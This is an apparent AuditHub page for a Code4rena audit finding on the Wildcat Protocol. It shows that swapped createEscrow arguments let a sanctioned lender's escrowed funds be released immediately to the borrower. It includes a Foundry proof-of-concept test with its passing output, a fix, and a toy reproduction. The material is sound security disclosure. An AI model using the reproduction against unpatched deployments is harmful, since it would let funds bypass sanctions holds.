The Wildcat Protocol - 0xSwahili's results

Banking, but worse - a protocol for fixed-rate, undercollateralised credit facilities.

General Information

Platform: Code4rena

Start Date: 16/10/2023

Pot Size: $60,500 USDC

Total HM: 16

Participants: 131

Period: 10 days

Judge: 0xTheC0der

Total Solo HM: 3

Id: 296

League: ETH

Wildcat Protocol

Findings Distribution

Researcher Performance

Rank: 105/131

Findings: 1

Award: $6.67

🌟 Selected for report: 0

🚀 Solo Findings: 0

Awards

6.6715 USDC - $6.67

Labels

bug
3 (High Risk)
satisfactory
upgraded by judge
edited-by-warden
duplicate-68

External Links

Lines of code

https://github.com/code-423n4/2023-10-wildcat/blob/c5df665f0bc2ca5df6f06938d66494b11e7bdada/src/market/WildcatMarketWithdrawals.sol#L166

Vulnerability details

Impact

Funds escrowed in a WildcatSanctionsEscrow, whether by WildcatMarketWithdrawals.executeWithdrawal or by src/market/WildcatMarketBase.sol::_blockAccount, can be released immediately, against the protocol design of holding them until the sanctioned account is cleared. Both call sites pass (accountAddress, borrower, asset) to the sentinel's createEscrow, whose parameter order is (borrower, account, asset). The escrow is therefore created with the two addresses swapped: its release check asks the sentinel whether the borrower (not the sanctioned lender) is sanctioned, which is false, so releaseEscrow() succeeds at once, and it pays out to the escrow's account field, which now holds the borrower's address rather than the lender's.

Proof of Concept

Add this test to test/market/WildcatMarketWithdrawals.t.sol (contract WithdrawalsTest). It deposits as alice, queues a withdrawal, sanctions alice, executes the withdrawal so the funds land in escrow, and then releases the escrow while alice is still sanctioned:

    function test_can_withdraw_sanctioned_executeWithdrawal_Sanctioned() external {
        _deposit(alice, 1e18);
        _requestWithdrawal(alice, 1e18);
        fastForward(parameters.withdrawalBatchDuration);
        // alice becomes sanctioned before her withdrawal is executed
        sanctionsSentinel.sanction(alice);
        // same (swapped) argument order the market uses, so the predicted address matches
        address escrow = sanctionsSentinel.getEscrowAddress(alice, borrower, address(asset));
        vm.expectEmit(address(asset));
        emit Transfer(address(market), escrow, 1e18);
        vm.expectEmit(address(market));
        emit SanctionedAccountWithdrawalSentToEscrow(alice, escrow, uint32(block.timestamp), 1e18);
        // withdrawal is diverted into the escrow instead of being paid to alice
        market.executeWithdrawal(alice, uint32(block.timestamp));
        // should revert with CanNotReleaseEscrow while alice is sanctioned, but does not
        WildcatSanctionsEscrow(escrow).releaseEscrow();
        WildcatSanctionsEscrow(escrow).balance();
    }

Then run it as:

forge test --match-path test/market/WildcatMarketWithdrawals.t.sol --match-contract WithdrawalsTest --match-test "test_can_withdraw_sanctioned_executeWithdrawal_Sanctioned"

Test results (the test passes, i.e. releaseEscrow() did not revert although alice is still sanctioned):

    Running 1 test for test/market/WildcatMarketWithdrawals.t.sol:WithdrawalsTest
    [PASS] test_can_withdraw_sanctioned_executeWithdrawal_Sanctioned() (gas: 929168)
    Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.93ms

Tools Used

Manual review

Recommended Mitigation Steps

Pass the borrower and account arguments to createEscrow in the order the sentinel declares them, at both call sites (WildcatMarketWithdrawals.sol#L166 and WildcatMarketBase.sol::_blockAccount):

    address escrow = IWildcatSanctionsSentinel(sentinel).createEscrow(
        borrower,
        accountAddress,
        address(asset)
    );
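To make the effect of the argument order visible in isolation, here is an added, self-contained Foundry test. It is example code, not Wildcat's; it assumes forge-std is available and uses toy stand-ins (ToyToken, ToySanctionsList, ToySentinel, ToyEscrow) that keep only the behaviour the finding depends on: createEscrow takes (borrower, account, asset), canReleaseEscrow() is the negation of sentinel.isSanctioned(borrower, account), which looks up the second argument on the sanctions list, and releaseEscrow() pays the escrow's account. The first test creates the escrow with the order the market currently uses and shows it releases immediately, to the borrower; the second uses the order from the mitigation and shows it stays locked while the lender is sanctioned.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not Wildcat's code. Toy versions of the token, sanctions
// list, sentinel and escrow, reduced to the behaviour the finding relies on.
import "forge-std/Test.sol";

contract ToyToken {
    mapping(address => uint256) public balanceOf;
    function mint(address to, uint256 amt) external { balanceOf[to] += amt; }
    function transfer(address to, uint256 amt) external returns (bool) {
        balanceOf[msg.sender] -= amt;
        balanceOf[to] += amt;
        return true;
    }
}

// Hypothetical stand-in for the Chainalysis list: a plain mapping.
contract ToySanctionsList {
    mapping(address => bool) public isSanctioned;
    function sanction(address a) external { isSanctioned[a] = true; }
}

contract ToySentinel {
    ToySanctionsList public immutable list;
    constructor(ToySanctionsList l) { list = l; }

    // Only the second argument (`account`) is looked up on the list;
    // the first (`borrower`) is ignored here, as the real override check is omitted.
    function isSanctioned(address, address account) external view returns (bool) {
        return list.isSanctioned(account);
    }

    // Same parameter order as the real createEscrow(borrower, account, asset).
    function createEscrow(address borrower, address account, address asset) external returns (ToyEscrow) {
        return new ToyEscrow(this, borrower, account, asset);
    }
}

contract ToyEscrow {
    ToySentinel public immutable sentinel;
    address public immutable borrower;
    address public immutable account;
    ToyToken public immutable asset;

    constructor(ToySentinel s, address b, address a, address t) {
        sentinel = s; borrower = b; account = a; asset = ToyToken(t);
    }

    function canReleaseEscrow() public view returns (bool) {
        return !sentinel.isSanctioned(borrower, account);
    }

    // Releases the whole balance to `account`.
    function releaseEscrow() external {
        require(canReleaseEscrow(), "CanNotReleaseEscrow");
        asset.transfer(account, asset.balanceOf(address(this)));
    }
}

contract EscrowArgOrderTest is Test {
    ToyToken token;
    ToySanctionsList list;
    ToySentinel sentinel;
    address borrower = address(0xB0B);   // constructed addresses for the example
    address alice = address(0xA11CE);

    function setUp() public {
        token = new ToyToken();
        list = new ToySanctionsList();
        sentinel = new ToySentinel(list);
        list.sanction(alice);            // alice is the sanctioned lender
    }

    // Argument order the market currently uses: (account, borrower, asset).
    function test_swappedArgs_releaseImmediatelyToBorrower() public {
        ToyEscrow e = sentinel.createEscrow(alice, borrower, address(token));
        token.mint(address(e), 1e18);
        assertTrue(e.canReleaseEscrow());          // sentinel checks `borrower`, who is not listed
        e.releaseEscrow();
        assertEq(token.balanceOf(borrower), 1e18); // payout goes to the borrower
        assertEq(token.balanceOf(alice), 0);
    }

    // Argument order from the mitigation: (borrower, account, asset).
    function test_correctArgs_stayLockedWhileSanctioned() public {
        ToyEscrow e = sentinel.createEscrow(borrower, alice, address(token));
        token.mint(address(e), 1e18);
        assertFalse(e.canReleaseEscrow());
        vm.expectRevert(bytes("CanNotReleaseEscrow"));
        e.releaseEscrow();
        assertEq(token.balanceOf(address(e)), 1e18); // funds remain in escrow
    }
}
```

Save it as test/EscrowArgOrder.t.sol inside a Foundry project with forge-std installed and run forge test --match-contract EscrowArgOrderTest; both tests pass, the first one precisely because the escrow built with the swapped order does not revert.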

Assessed type

Invalid Validation

#0 - c4-pre-sort

2023-10-28T10:07:54Z

minhquanym marked the issue as duplicate of #515

#1 - c4-judge

2023-11-07T11:46:36Z

MarioPoneder changed the severity to 3 (High Risk)

#2 - c4-judge

2023-11-07T12:11:47Z

MarioPoneder marked the issue as satisfactory

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built by malatrax © 2024
